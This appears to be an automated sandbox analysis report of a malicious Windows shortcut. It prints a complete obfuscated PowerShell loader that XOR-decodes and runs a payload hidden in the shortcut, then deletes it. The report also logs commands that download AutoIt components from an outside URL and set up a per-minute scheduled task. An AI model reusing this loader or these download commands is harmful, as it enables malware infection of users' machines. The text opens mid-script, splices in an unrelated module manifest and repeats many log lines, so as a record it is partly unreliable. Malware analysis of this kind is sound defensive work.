vzGyLDmQaW{$djLutZCNrS=pXufClQZMa;$rqZWEoTXlI=JogMjclRPK;$zPedYniBfy=$rqZWEoTXlI[0];$CvytSiJOHD=[System.IO.BinaryReader]::new([System.IO.File]::open($zPedYniBfy,[System.IO.FileMode]::Open,[System.IO.FileAccess]::ReadWrite,[System.IO.FileShare]::None));try{$CvytSiJOHD.BaseStream.Seek(0x00001DA5,[System.IO.SeekOrigin]::Begin);$fKLtldjopW=$CvytSiJOHD.ReadBytes(0x00006C00);}finally{$CvytSiJOHD.Close()};for($nJlRQzeAUM=0; $nJlRQzeAUM -lt $fKLtldjopW.count; $nJlRQzeAUM++) { $fKLtldjopW[$nJlRQzeAUM]=$fKLtldjopW[$nJlRQzeAUM] -bxor 0xD8 };[System.IO.File]::WriteAllBytes($djLutZCNrS,$fKLtldjopW);$oEefgawPUH='.\'+$djLutZCNrS;& $oEefgawPUH;return 'WbpvmJeASc'};$oEefgawPUH=vzGyLDmQaW;$WrKnPBwfdh=JogMjclRPK;remove-item -path $WrKnPBwfdh[1] -force;@{# Script module or binary module file associated with this manifest.ModuleToProcess = 'Pester.psm1'# Version number of this module.ModuleVersion = '3.4.0'# ID used to uniquely identify this moduleGUID = 'a699dea5-2c73-4616-a270-1f7abb777e71'# Author of this moduleAuthor = 'Pester Team'# Company or vendor of this moduleCompanyName = 'Pester'# Copyright statement for this moduleCopyright = 'Copyright (c) 2016 by Pester Team, licensed under Apache 2.0 License.'# Description of the functionality provided by this moduleDescription = 'Pester provides a framework for running BDD style Tests to execute and validate PowerShell commands inside of PowerShell and offers a powerful set of Mocking Functions that allow tests to mimic and mock the functionality of any command inside of a piece of powershell code being tested. Pester tests can execute any command or script that is accesible to a pester test file. This can include functions, Cmdlets, Modules and scripts. Pester can be run in ad hoc style in a console or it can be integrated into the Build scripts of a Continuous Integration system.'# Minimum version of the Windows PowerShell engine required by this modulePowerShellVersion = '2.0'# Functions to export from this moduleFunctionsToExport = @( 'Describe', 'Context', 'It', 'Should', 'Mock', 'Assert-MockCalled', 'Assert-VerifiableMocks', 'New-Fixture', 'Get-TestDriveItem', 'Invoke-Pester', 'Setup', 'In', 'InModuleScope', 'Invoke-Mock', 'BeforeEach', 'AfterEach', 'BeforeAll', 'AfterAll' 'Get-MockDynamicParameters', 'Set-DynamicParameterVariables', 'Set-TestInconclusive', 'Sa

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\schtasks.exe schtasks /create /sc minute /mo 1 /tn "QwbpjvdmTA" /tr "c:\GSlLzFnTov\AutoIt3.exe c:\GSlLzFnTov\QwbpjvdmTA.au3"

Hooking and other Techniques for Hiding and Protection

Deletes itself after installation

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File deleted: c:\users\user\desktop\knfv5ivjev.lnk

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3969	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4086	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5279
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1522

Source: C:\GSlLzFnTov\GSlLzFnTov.exe

Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep

Source: C:\GSlLzFnTov\GSlLzFnTov.exe	API coverage: 8.4 %
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	API coverage: 8.7 %

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7596	Thread sleep count: 3969 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7600	Thread sleep count: 4086 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7660	Thread sleep time: -6456360425798339s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7648	Thread sleep time: -1844674407370954s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7780	Thread sleep count: 5279 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7784	Thread sleep count: 1522 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7808	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7796	Thread sleep time: -2767011611056431s >= -30000s

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: GSlLzFnTov.exe, 00000009.00000003.1436313162.000002AD15303000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll)
Source: GSlLzFnTov.exe, 00000008.00000003.1414994550.0000024D89B63000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll*
Source: GSlLzFnTov.exe, 0000000C.00000003.1481445331.000001C4E4524000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll!
Source: GSlLzFnTov.exe, 0000000E.00000003.1503111107.0000022C409E5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\GSlLzFnTov\GSlLzFnTov.exe

Code function: 8_2_00007FF7F1DEB8E4 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

8_2_00007FF7F1DEB8E4

Source: C:\GSlLzFnTov\GSlLzFnTov.exe

Code function: 8_2_00007FF7F1DB1D84 GetModuleHandleA,GetProcAddress,_mbspbrk,LoadLibraryA,GetProcAddress,LoadLibraryExA,GetSystemDirectoryA,malloc,GetSystemDirectoryA,LoadLibraryA,free,

8_2_00007FF7F1DB1D84

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug

Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 8_2_00007FF7F1DEBA8C SetUnhandledExceptionFilter,	8_2_00007FF7F1DEBA8C
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 8_2_00007FF7F1DEB8E4 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	8_2_00007FF7F1DEB8E4
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 8_2_00007FF7F1DEAFA0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	8_2_00007FF7F1DEAFA0
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 12_2_00007FF700E9BA8C SetUnhandledExceptionFilter,	12_2_00007FF700E9BA8C
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 12_2_00007FF700E9AFA0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	12_2_00007FF700E9AFA0
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 12_2_00007FF700E9B8E4 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	12_2_00007FF700E9B8E4

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden function JogMjclRPK(){$zPedYniBfy=Get-ChildItem .lnk;$zPedYniBfy=$zPedYniBfy\|where-object{$_.length -eq 0x0002233E};$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy\|Select-Object -ExpandProperty Name;if($zPedYniBfy.length -eq 0){cd $env:TEMP;$zPedYniBfy=Get-ChildItem .lnk;$zPedYniBfy=$zPedYniBfy\|where-object {$_.length -eq 0x0002233E} ;$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy\|Select-Object -ExpandProperty Name;}return @($zPedYniBfy, $nJlRQzeAUMCXVjArUNw)};function pXufClQZMa(){$djLutZCNrS=JogMjclRPK;$zPedYniBfy=$djLutZCNrS[0];$zPedYniBfy=$zPedYniBfy.substring(0,$zPedYniBfy.length-4);return $zPedYniBfy};function vzGyLDmQaW{$djLutZCNrS=pXufClQZMa;$rqZWEoTXlI=JogMjclRPK;$zPedYniBfy=$rqZWEoTXlI[0];$CvytSiJOHD=[System.IO.BinaryReader]::new([System.IO.File]::open($zPedYniBfy,[System.IO.FileMode]::Open,[System.IO.FileAccess]::ReadWrite,[System.IO.FileShare]::None));try{$CvytSiJOHD.BaseStream.Seek(0x00001DA5,[System.IO.SeekOrigin]::Begin);$fKLtldjopW=$CvytSiJOHD.ReadBytes(0x00006C00);}finally{$CvytSiJOHD.Close()};for($nJlRQzeAUM=0; $nJlRQzeAUM -lt $fKLtldjopW.count; $nJlRQzeAUM++) { $fKLtldjopW[$nJlRQzeAUM]=$fKLtldjopW[$nJlRQzeAUM] -bxor 0xD8 };[System.IO.File]::WriteAllBytes($djLutZCNrS,$fKLtldjopW);$oEefgawPUH='.\'+$djLutZCNrS;& $oEefgawPUH;return 'WbpvmJeASc'};$oEefgawPUH=vzGyLDmQaW;$WrKnPBwfdh=JogMjclRPK;remove-item -path $WrKnPBwfdh[1] -force;	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\attrib.exe attrib +h c:\GSlLzFnTov	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\GSlLzFnTov\GSlLzFnTov.exe GSlLzFnTov -k -o AutoIt3.exe https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago&za=honey0	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\GSlLzFnTov\GSlLzFnTov.exe GSlLzFnTov -k -o QwbpjvdmTA.au3 https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago&za=honey1	Jump to behavior
